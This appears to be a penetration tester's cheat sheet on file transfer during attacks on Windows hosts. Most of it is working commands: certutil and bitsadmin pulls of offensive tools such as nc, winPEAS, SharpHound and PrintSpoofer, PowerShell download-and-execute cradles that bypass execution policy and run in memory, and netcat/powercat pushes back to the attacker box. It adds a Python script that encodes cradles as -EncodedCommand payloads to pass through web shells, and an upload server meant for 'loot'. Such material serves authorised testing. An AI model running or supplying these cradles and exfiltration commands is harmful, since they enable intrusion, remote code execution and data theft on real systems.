```
axel target.com/file -o file
wget target.com/file -O file
curl target.com/file -o file
```

## transfer file first

Pull the toolset onto the target with certutil (the files are served from the attacker box, e.g. `python3 -m http.server 8000`; `127.0.0.1` here is a placeholder for that host). `-split` writes the file into the current directory, and certutil also keeps a copy in the user's CryptnetUrlCache, which `certutil -urlcache * delete` clears. certutil downloads are a well-known AV/EDR signature, so prefer another method on monitored hosts.

```
certutil -urlcache -split -f http://127.0.0.1:8000/powerview_new.ps1
certutil -urlcache -split -f http://127.0.0.1:8000/nc.exe
certutil -urlcache -split -f http://127.0.0.1:8000/getacl.ps1
certutil -urlcache -split -f http://127.0.0.1:8000/winPEASany.exe
certutil -urlcache -split -f http://127.0.0.1:8000/SharpHound.exe
certutil -urlcache -split -f http://127.0.0.1:8000/beRoot.exe
certutil -urlcache -split -f http://127.0.0.1:8000/PowerUp.ps1
certutil -urlcache -split -f http://127.0.0.1:8000/Seatbelt.exe
certutil -urlcache -split -f http://127.0.0.1:8000/SharpUp.exe
certutil -urlcache -split -f http://127.0.0.1:8000/PrintSpoofer.exe
```

## transfer file two

Second batch, same way:

```
GetCLSID.ps1
Rubeus.exe
```

## powershell

https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70

Download-and-run cradles. The `DownloadFile` variants write the payload to disk and then start it; the `DownloadString | IEX` variants execute the script in memory without touching disk. Which one works depends on how the command is nested (cmd.exe, a web shell, a Java string), because each layer re-interprets the quotes.

```bash
powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

# Sometimes the form below is needed instead (here embedded in a Java String literal, forward slashes in the path):
String cmd = "(New-object Net.WebClient).DownloadFile('http://192.168.49.57/shell.exe','c:/public/a.exe');start-process 'c:/public/a.exe'";

powershell.exe -ep bypass -c "iex (iwr 10.10.14.9:8000/ipw.ps1 -UseBasicParsing)"

# This one finally executed; it needs psh, not ps1
powershell.exe -Exec ByPass -NoProfile -c "(New-Object System.Net.WebClient).DownloadString('http://192.168.49.189/3389_64.ps1') | IEX"

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.187/3389.ps1')"

powershell.exe -Exec ByPass -c "(New-Object System.Net.WebClient).DownloadString('http://172.16.194.6/run.ps1') | IEX"

powershell -ExecutionPolicy Bypass -Command "[scriptblock]::Create((Invoke-WebRequest "https://gist.githubusercontent.com/ChrisKibble/afea9880a184cd2b2445e5d8408715af/raw/41cbbf042af07136132f09395e4664ffab33e310/gistfile1.txt").Content).Invoke();"
```

## bitsadmin

bitsadmin wants a job name, the remote URL and an absolute local path:

```
bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe
```

## ftp server

Anonymous FTP with write access (`-w`) on the attacker box; port 21 needs root, otherwise pick a port above 1023:

```
python3 -m pyftpdlib -p 21 -w
```

## remote desktop

```
xfreerdp /u:jamie /p:rangers /v:172.31.1.18
remmina   # Linux GUI client
```

## smb server

Serve a directory from the attacker box and copy from it with UNC paths. Recent Windows hosts refuse SMB1, so add `-smb2support` (and `-username`/`-password` if the guest share is rejected):

```
# server
impacket-smbserver ShareName SharePath -smb2support

# client, way 1: copy straight from the UNC path
copy \\IP\ShareName\file.exe file.exe

# client, way 2: map a drive letter, work in it, unmap afterwards
net use x: \\IP\ShareName
cd x:\
net use x: /delete

# example
copy \\10.10.17.83\temp\1.exe c:\Users\tolis\Desktop\1.exe
```

Executing a file directly works the same way, using the `\\IP\ShareName\file.exe` UNC path.

## lab machine to attack machine

Push a file back from the lab machine to the attacker box. Start the listener on the attack machine first; the `powercat` command needs `powercat.ps1` dot-sourced (or loaded with one of the cradles above) before it is available.

```
# lab machine
powercat -c ip -p port -i "file"
nc attackip atkport < file

# attack machine
nc -lvvp port > file
```

## ftp code

Authenticated pyftpdlib server, when anonymous write access is not wanted:

```python
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer

# The port the FTP server will listen on.
# This must be greater than 1023 unless you run this script as root.
FTP_PORT = 2121

# The name of the FTP user that can log in.
FTP_USER = "myuser"

# The FTP user's password.
FTP_PASSWORD = "change_this_password"

# The directory the FTP user will have full read/write access to.
FTP_DIRECTORY = "/srv/users/SYSUSER/apps/APPNAME/public/"


def main():
    authorizer = DummyAuthorizer()

    # Define a new user having full r/w permissions.
    authorizer.add_user(FTP_USER, FTP_PASSWORD, FTP_DIRECTORY, perm='elradfmw')

    handler = FTPHandler
    handler.authorizer = authorizer

    # Define a customized banner (string returned when client connects)
    handler.banner = "pyftpdlib based ftpd ready."

    # Optionally specify range of ports to use for passive connections.
    #handler.passive_ports = range(60000, 65535)

    address = ('', FTP_PORT)
    server = FTPServer(address, handler)

    server.max_cons = 256
    server.max_cons_per_ip = 5

    server.serve_forever()


if __name__ == '__main__':
    main()
```

## reverse_shell

[[3-reverse_shell]]
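Two helpers added here as worked examples; they are not part of the original notes. The first addresses the quoting trouble with the PowerShell cradles above: `powershell.exe -EncodedCommand` takes the script as Base64 over UTF-16LE, so the cradle can be nested through cmd.exe, a web shell or a Java string without any quotes reaching the outer command line. The URLs and paths are placeholders taken from the notes; the three cradle templates are the same `DownloadFile`, `DownloadString | IEX` and `iwr` forms used above.

```python
#!/usr/bin/env python3
"""Build a PowerShell download cradle as an -EncodedCommand payload.

Added example, not from the original notes. -EncodedCommand expects the
script as Base64 of its UTF-16LE encoding; decode_command() reverses it,
which is also handy when triaging a suspicious "-enc" blob in a log.
"""
import base64

# Cradle templates; {url} and {dest} are filled in by build_cradle().
CRADLES = {
    # Download to disk and run it (leaves the file on the target).
    "file": "(New-Object Net.WebClient).DownloadFile('{url}','{dest}');Start-Process '{dest}'",
    # Download into memory and execute; nothing is written to disk.
    "memory": "IEX (New-Object Net.WebClient).DownloadString('{url}')",
    # Invoke-WebRequest variant; -UseBasicParsing avoids the IE-engine dependency.
    "iwr": "IEX (iwr '{url}' -UseBasicParsing)",
}


def build_cradle(kind: str, url: str, dest: str = "") -> str:
    """Return the plain PowerShell script for one of the cradle styles."""
    if kind == "file" and not dest:
        raise ValueError("the 'file' cradle needs a destination path")
    return CRADLES[kind].format(url=url, dest=dest)


def encode_command(script: str) -> str:
    """UTF-16LE then Base64: the encoding powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(encoded: str) -> str:
    """Reverse of encode_command()."""
    return base64.b64decode(encoded).decode("utf-16-le")


def encoded_command_line(script: str) -> str:
    """Full command line, with the -NoProfile / -ExecutionPolicy Bypass flags used in the notes."""
    return ("powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand "
            + encode_command(script))


if __name__ == "__main__":
    cradle = build_cradle("memory", "http://192.168.49.187/3389.ps1")
    print(encoded_command_line(cradle))
    # Round-trip check: what we produced decodes back to the same script.
    assert decode_command(encode_command(cradle)) == cradle
```

Run it on the attacker box and paste the printed line into whatever executes commands on the target; the same Base64 can be dropped into the `String cmd = ...` Java form above without worrying about escaping the single quotes.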
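The second added example covers the "lab machine to attack machine" direction without needing nc or powercat on the target. It is an upload-capable replacement for `python3 -m http.server`, written for these notes and not part of any project: GET serves the current directory as usual, PUT stores the request body under an upload directory, and every file handed out or received is logged with its SHA-256 so the copy can be checked on the Windows side with `certutil -hashfile <file> SHA256`. The upload directory name and the port are assumptions; the PUT path is validated so a client cannot write outside that directory.

```python
#!/usr/bin/env python3
"""HTTP server that serves files (GET) and accepts uploads (PUT).

Added example for these notes. From the lab machine, push a file with:
    Invoke-WebRequest -Uri http://ATTACKER:8000/loot.zip -Method Put -InFile .\loot.zip
or with curl:  curl -T loot.zip http://ATTACKER:8000/loot.zip
"""
import hashlib
import os
import sys
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Assumed: uploads land in ./uploads unless UPLOAD_DIR is set in the environment.
UPLOAD_DIR = os.path.abspath(os.environ.get("UPLOAD_DIR", "uploads"))


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of a byte string."""
    return hashlib.sha256(data).hexdigest()


def safe_upload_path(base_dir: str, request_path: str):
    """Map a request path onto base_dir, refusing anything that escapes it.

    Returns the absolute destination, or None when the path is empty, is the
    directory itself, or would traverse outside base_dir (PUT /../../x).
    """
    base_dir = os.path.abspath(base_dir)
    name = request_path.split("?", 1)[0].lstrip("/")
    if not name:
        return None
    dest = os.path.abspath(os.path.join(base_dir, name))
    if dest == base_dir or os.path.commonpath([base_dir, dest]) != base_dir:
        return None
    return dest


def certutil_check(filename: str, digest: str) -> str:
    """Command to run on the Windows side to confirm the transferred copy is intact."""
    return f"certutil -hashfile {filename} SHA256   (expect {digest})"


class TransferHandler(SimpleHTTPRequestHandler):
    """GET serves files from the working directory; PUT stores bodies under UPLOAD_DIR."""

    def do_PUT(self):
        dest = safe_upload_path(UPLOAD_DIR, self.path)
        if dest is None:
            self.send_error(400, "bad upload path")
            return
        length = int(self.headers.get("Content-Length", 0))
        data = self.rfile.read(length)
        os.makedirs(os.path.dirname(dest), exist_ok=True)
        with open(dest, "wb") as fh:
            fh.write(data)
        self.log_message("uploaded %s (%d bytes) sha256=%s", dest, len(data), sha256_hex(data))
        self.send_response(201)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        # Log the hash of each file handed out, next to the check to run on the target.
        path = self.translate_path(self.path)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                digest = sha256_hex(fh.read())
            self.log_message("serving %s -> %s", path,
                             certutil_check(os.path.basename(path), digest))
        super().do_GET()


if __name__ == "__main__":
    port = int(sys.argv[1]) if len(sys.argv) > 1 else 8000
    os.makedirs(UPLOAD_DIR, exist_ok=True)
    print(f"serving {os.getcwd()} on 0.0.0.0:{port}; uploads go to {UPLOAD_DIR}")
    ThreadingHTTPServer(("0.0.0.0", port), TransferHandler).serve_forever()
```

Run it in the directory holding the tools (`python3 transfer_server.py 8000`), download with the certutil or PowerShell cradles above, and compare the logged digest with `certutil -hashfile` on the target. The path check matters because the server is usually started as your own user on the attack box, and an unguarded PUT would let anyone on the lab network overwrite files there.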